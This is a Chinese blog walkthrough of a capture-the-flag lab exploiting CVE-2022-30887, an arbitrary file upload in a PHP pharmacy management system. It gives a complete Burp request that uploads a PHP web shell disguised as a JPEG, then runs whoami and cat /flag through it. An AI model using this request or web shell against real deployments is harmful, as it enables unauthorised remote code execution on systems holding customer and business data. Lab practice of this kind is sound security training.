[春期云镜] CVE-2022-30887(Pharmacy Management System shell upload)详细教程

最新推荐文章于 2023-11-21 00:31:32 发布
最新推荐文章于 2023-11-21 00:31:32 发布
阅读量463 收藏
点赞数 2
分类专栏: 春秋云镜 网络安全 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60374959/article/details/128021224
版权

目录

前期准备

工具

渗透测试

靶场提示

靶场实战

前期准备

工具

bupsuite

渗透测试

靶场提示

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

靶场实战

登入界面

对网页刷新并进行抓包

 右键发送reteaper

 将数据包更换成以下数据,send发送。如下图表示成功。

POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: ip:port                ##此处修改为你的靶场IP+端口模式,不需要加login.php
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 556
Connection: close
Cookie: PHPSESSID=t1jo541l52f76t9upiu0pbqv0c
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--

 接下来访问IP:port/assets/myimages/shell.php?s=whoami 执行命令

 

ip:port/assets/myimages/shell.php?s=cat /flag
找到flag

 

flag{e5464675-ae4f-4977-afa3-f730f6823ecf}
心"元"意“码”
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHARMACY-MANAGEMENT-SYSTEM
03-22
PHARMACY-MANAGEMENT-SYSTEM
CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-30887漏洞复现
weixin_45177807的博客
11-06 2247
CVE-2022-30887漏洞复现
境】CVE-2022-30887
ZXW_NUDT的博客
02-22 2562
境】CVE-2022-30887
CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1567
CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
境:CVE-2022-30887
一只爱吃橙子的羊
11-29 4000
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
pharmacy-management-system:具有完整功能的药房管理系统
03-11
总的来说,"pharmacy-management-system"不仅提供了全面的药房管理工具,还通过开源模式鼓励社区参与,促进了系统的持续发展和优化。这对于希望拥有个性化、高效且灵活管理系统的药房来说,无疑是一个极具吸引力的...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
境:CVE-2022-30887(文件上传漏洞)
m0_65712192的博客
04-14 2345
该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
CVE-2022-30887
biejianghua的博客
11-28 640
CVE-2022-30887
CVE-2022-30887 多语言药房管理系统 (MPMS) [超详细新手教程]
starttv的博客
10-26 4553
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
CVE-2022-30887wp】
风依旧的博客
10-18 3456
CVE-2022-30887 WP
CVE-2022-30887秋运漏洞复现
m0_51674437的博客
07-03 293
CVE-2022-30887漏洞复现
境靶场CVE-2022-30887漏洞复现(任意文件上传漏洞)
zyh1588的博客
11-21 853
小白复现CVE-2022-30887漏洞
Windows CVE-2022-21907漏洞复现
qq_53579360的博客
11-13 1884
漏洞复现
CVE-2022-33891漏洞复现
蚁景网安学院
07-25 2151
简介Spark 是用于大规模数据处理的统一分析引擎。它提供了 Scala、Java、Python 和 R 中的高级 API,以及支持用于数据分析的通用计算图的优化引擎。它还支持一组丰富的高级工具,包括用于 SQL 和 DataFrames 的 Spark SQL、用于 Pandas 工作负载的 Spark 上的 Pandas API、用于机器学习的 MLlib、用于图形处...
CVE-2022-30887
09-05
CVE-2022-30887是指Pharmacy Management System文件上传漏洞,该漏洞的CVE编号为CVE-2022-30887。此漏洞可能允许攻击者通过上传恶意文件利用系统中的漏洞。请注意,由于未提供更多信息,我无法提供详细的修复建议。建议您及时升级系统或软件,并参考官方渠道获取最新的安全信息和修复方案,以确保系统的安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [境:CVE-2022-30887](https://blog.csdn.net/laobanjiull/article/details/128100253)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

心"元"意“码”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值